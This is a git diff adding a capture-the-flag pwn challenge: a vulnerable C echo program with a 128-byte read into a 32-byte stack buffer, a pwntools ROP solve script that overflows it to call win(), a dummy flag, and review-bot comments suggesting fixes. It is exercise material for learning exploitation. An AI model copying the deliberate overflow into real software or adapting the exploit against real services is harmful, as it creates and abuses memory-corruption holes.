diff --git a/pwn/echo_escape_1/flag.txt b/pwn/echo_escape_1/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/echo_escape_1/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/echo_escape_1/solve.py b/pwn/echo_escape_1/solve.py
new file mode 100755
index 0000000..0cf8314
--- /dev/null
+++ b/pwn/echo_escape_1/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+ r.recvuntil(b'Please enter your name: ').decode()
+
+ offset = 0x28
+ rop = ROP(exe)
+ rop.raw(rop.generatePadding(0, offset))
+ rop.win()
+ r.sendline(rop.chain())
+ print(r.recvline_contains(b'picoCTF').decode())
+ r.close()
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/echo_escape_1/vuln b/pwn/echo_escape_1/vuln
new file mode 100755
index 0000000..f648bdc
Binary files /dev/null and b/pwn/echo_escape_1/vuln differ
diff --git a/pwn/echo_escape_1/vuln.c b/pwn/echo_escape_1/vuln.c
new file mode 100644
index 0000000..e5766ba
--- /dev/null
+++ b/pwn/echo_escape_1/vuln.c
@@ -0,0 +1,34 @@
+
+#include
+#include
+#include
+
+void win() {
+ FILE *fp = fopen("flag.txt", "rb");
+ if (!fp) {
+ perror("[!] Failed to open flag.txt");
+ return;
+ }
+
+ char buffer[128];
+ size_t n = fread(buffer, 1, sizeof(buffer), fp);
+ fwrite(buffer, 1, n, stdout);
+ fflush(stdout);
+ printf("\n");
+ fclose(fp);
+}
+
+int main() {
+ char buf[32];
+
+ printf("Welcome to the secure echo service!\n");
+ printf("Please enter your name: ");
+ fflush(stdout);
+
+ read(0, buf, 128);
+
+ printf("Hello, %s\n", buf);
+ printf("Thank you for using our service.\n");
+
+ return 0;
+}
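Review bot: In main of solve.py, `r.recvuntil(b'Please enter your name: ').decode()` decodes a value that is immediately discarded, so the `.decode()` is dead work; keep just `r.recvuntil(b'Please enter your name: ')`. `r.close()` is only reached when `recvline_contains` succeeds — if the target exits before printing anything matching, the call raises EOFError and the tube is left open; pwntools tubes support the context-manager protocol as far as I recall, so `with conn() as r:` would release it on either path. `offset = 0x28` is a bare magic number; a one-line comment stating where it comes from (the `buf[32]` declared in vuln.c plus the saved frame pointer) would make the script self-explanatory to the next reader.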
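Review bot: In main of vuln.c, `read(0, buf, 128)` writes up to 128 bytes into the 32-byte `buf` and its return value is ignored, so the input is never NUL-terminated before `printf("Hello, %s\n", buf)`; this is evidently the challenge's intended bug, but the repository copy should say so, e.g. `/* intentionally vulnerable: 128-byte read into a 32-byte stack buffer, no NUL terminator */` above the read, so nobody "fixes" it by accident or copies the pattern elsewhere. A hardened echo would bound the read to the buffer and terminate it: `ssize_t n = read(0, buf, sizeof(buf) - 1); buf[n > 0 ? n : 0] = '\0';`. The three `#include` directives also show no header names in this rendering, which looks like an extraction artifact rather than the committed text — worth confirming the file compiles as committed.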